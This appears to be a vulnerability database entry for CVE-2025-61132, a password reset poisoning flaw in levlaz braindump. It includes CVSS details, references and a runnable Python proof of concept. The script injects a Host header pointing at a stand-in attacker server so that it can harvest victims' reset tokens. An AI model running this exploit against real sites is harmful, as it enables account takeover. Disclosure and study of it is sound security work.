CVE-2025-61132

Description

A Host Header Injection vulnerability in the password reset component in levlaz braindump v0.4.14 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

levlaz braindump < 0.4.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # CVE-2025-61132 Password Reset Host Header Injection PoC # Target: levlaz braindump v0.4.14 TARGET_URL = "http://target-server.com" # Replace with actual target ATTACKER_HOST = "evil.attacker.com" # Replace with attacker controlled server def exploit_host_header_injection(): """ Perform Host Header Injection attack for password reset poisoning. Steps: 1. Send password reset request with malicious Host header 2. Wait for victim to click the crafted reset link 3. Capture the reset token from the attacker server logs 4. Use token to reset victim's password """ # Step 1: Request password reset with injected Host header reset_endpoint = f"{TARGET_URL}/forgot" headers = { "Host": ATTACKER_HOST, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } data = { "email": "[email protected]" # Target victim's email } print(f"[*] Sending password reset request to {TARGET_URL}") print(f"[*] Injecting Host header: {ATTACKER_HOST}") try: response = requests.post(reset_endpoint, data=data, headers=headers, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") print(f"[*] Check {ATTACKER_HOST} logs for captured reset tokens") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def check_vulnerability(): """ Check if the target is vulnerable by observing Host header reflection. """ check_endpoint = f"{TARGET_URL}/forgot" test_headers = { "Host": "test.injection.com", "User-Agent": "Vulnerability Scanner" } response = requests.get(check_endpoint, headers=test_headers, allow_redirects=False) # Check if the response contains references to the injected host if "test.injection.com" in response.text or "test.injection.com" in str(response.headers): print("[!] Target appears to be vulnerable to Host Header Injection") return True else: print("[-] Target does not appear to be vulnerable") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-61132 Host Header Injection PoC") print("Target: levlaz braindump v0.4.14") print("=" * 60) # First check if vulnerable is_vulnerable = check_vulnerability() if is_vulnerable: print("\n[*] Proceeding with exploitation...") exploit_host_header_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61132
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61132
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61132/
[4] VulDB https://vuldb.com/cve/CVE-2025-61132
[5] https://drive.google.com/file/d/1FmkctLdOTGMdy6GgLaTzfxemdVDeiA7J/view?usp=sharing
[6] https://gist.github.com/BrookeYangRui/94c3bee0c2cbc1ed81a21d4448550c21
[7] https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/auth/views.py#L131-L148
[8] https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/templates/auth/email/reset_password.html#L1-L8
[9] https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61132", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:44.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Host Header Injection vulnerability in the password reset component in levlaz braindump v0.4.14 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://drive.google.com/file/d/1FmkctLdOTGMdy6GgLaTzfxemdVDeiA7J/view?usp=sharing", "source": "[email protected]"}, {"url": "https://gist.github.com/BrookeYangRui/94c3bee0c2cbc1ed81a21d4448550c21", "source": "[email protected]"}, {"url": "https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/auth/views.py#L131-L148", "source": "[email protected]"}, {"url": "https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/templates/auth/email/reset_password.html#L1-L8", "source": "[email protected]"}, {"url": "https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning", "source": "[email protected]"}]}}